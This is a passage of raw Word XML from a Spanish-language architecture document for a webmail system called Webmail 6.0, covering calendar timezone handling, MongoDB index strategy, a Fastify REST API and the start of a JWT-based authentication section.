        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'tentative'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'cancelled'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Timestamp de creación local */</w:t>
      </w:r>
      <w:r>
        <w:br/>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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Timestamp de última modificación local */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  updatedAt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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El manejo de timezones es uno de los mayores desafíos en la integración de calendarios: las definiciones VTIMEZONE en archivos ICS son notoriamente problemáticas entre clientes, especialmente Outlook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[155]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[156]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Webmail 6.0 adopta la recomendación de usar timezones de la base de datos IANA (tz database) y convertir a UTC cuando sea posible para almacenamiento interno, aplicando la zona horaria del usuario solo en el momento de renderizado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[155]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La sincronización bidireccional con servidores CalDAV requiere manejo de conflictos mediante ETags para detección de cambios concurrentes, sync-tokens para sincronización incremental, y resolución a nivel de campo para minimizar pérdida de datos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[226]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. tsdav proporciona soporte integrado para estos mecanismos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[190]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Índices:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{userId: 1, startDate: -1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para listar eventos próximos.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{accountId: 1, calendarId: 1, startDate: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para listar eventos por calendario en un rango.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{uid: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— unique sparse, para evitar duplicados de evento.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{sourceEmailId: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para vincular eventos con emails de invitación.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="86"/>
    <w:bookmarkStart w:id="87" w:name="resumen-de-estrategia-de-indexado"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.9 Resumen de Estrategia de Indexado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La performance del webmail depende críticamente de que las queries más frecuentes se resuelvan como index-covered scans. La siguiente tabla consolida la estrategia de indexado por colección:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1320"/>
        <w:gridCol w:w="2040"/>
        <w:gridCol w:w="2040"/>
        <w:gridCol w:w="2520"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Colección</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Índice Principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Campos Cubiertos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Complejidad de Query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{primaryEmail: 1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Login, lookup de perfil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">O(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{userId: 1, isPrimary: -1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Listar cuentas multi-inbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">O(n accounts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">folders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{accountId: 1, sortOrder: 1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sidebar de carpetas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">O(n folders)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{accountId: 1, folderId: 1, date: -1, uid: 1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Listado de inbox</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[204]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">O(log n) index scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{accountId: 1, threadId: 1, date: -1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conversaciones (JWZ)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[56]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">O(log n) index scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">attachments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{emailId: 1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Listar adjuntos de un email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">O(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">contacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{userId: 1, isFrequent: -1, usageCount: -1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Autocomplete en compositor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">O(log n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">drafts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{accountId: 1, lastModifiedAt: -1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Listar borradores recientes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">O(log n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{userId: 1, startDate: -1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Eventos próximos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">O(log n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para búsquedas full-text complejas — aquellas que escapan a los índices compuestos — MongoDB Atlas Search proporciona un motor basado en Apache Lucene integrado directamente en la base de datos, eliminando la necesidad de un cluster Elasticsearch separado y reduciendo el time-to-market en un 30-50% para proyectos greenfield</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[132]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Las capacidades de Atlas Search utilizadas por Webmail 6.0 incluyen: búsqueda de texto sobre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">subject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">from.address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">to.address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">preview</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; filtrado por rango de fechas; highlighting de términos coincidentes; y fuzzy matching para corrección de typos en términos de búsqueda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[129]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="87"/>
    <w:bookmarkEnd w:id="88"/>
    <w:bookmarkStart w:id="99" w:name="api-rest-fastify"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. API REST Fastify</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El API de Webmail 6.0 se implementa sobre Fastify 4, seleccionado por su rendimiento 2-3x superior a Express en benchmarks controlados (14,460 req/s vs 6,150 req/s bajo 100 conexiones concurrentes) y su sistema de plugins con encapsulación nativa que permite estructurar el webmail como módulos independientes sin filtración de middlewares entre rutas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[130]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[128]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Cada dominio funcional — autenticación, cuentas IMAP, emails, carpetas, composición, adjuntos, contactos y calendario — se implementa como un plugin Fastify con su propio prefix, decorators, hooks y handlers, siguiendo la guía oficial de plugins de Fastify que promueve la composición de aplicaciones complejas a partir de módulos encapsulados</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[149]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La serialización de respuestas utiliza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fast-json-stringify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que puede ser hasta 2x más rápido que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON.stringify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nativo gracias a la compilación de schemas de validación en funciones de serialización optimizadas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[130]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El router</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find-my-way</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(trie-based) ofrece aproximadamente 3x el rendimiento del router de Express, lo que resulta crítico para endpoints de alta frecuencia como el listado de emails y las operaciones de auto-save de drafts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[130]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Todas las rutas protegidas requieren un access token JWT válido en el header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: Bearer &lt;token&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, con excepción de los endpoints de autenticación. El sistema implementa rate limiting mediante el algoritmo Sliding Window con Redis Sorted Sets (ZSET), que ofrece la mejor precisión para APIs de producción al eliminar el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">burst effect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de los límites de ventana fija</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[156]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[158]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="89" w:name="autenticación"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Autenticación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El módulo de autenticación implementa el patrón BFF (Backend-for-Frontend) con token rotation, donde el access token se almacena en memoria del frontend y el refresh token se entrega como cookie HTTP-only con atributos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite: Strict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[157]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[160]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Redis actúa como store para los refresh tokens, aprovechando su soporte nativo de expiración (SETEX con TTL) para invalidación automática</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[157]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1173"/>
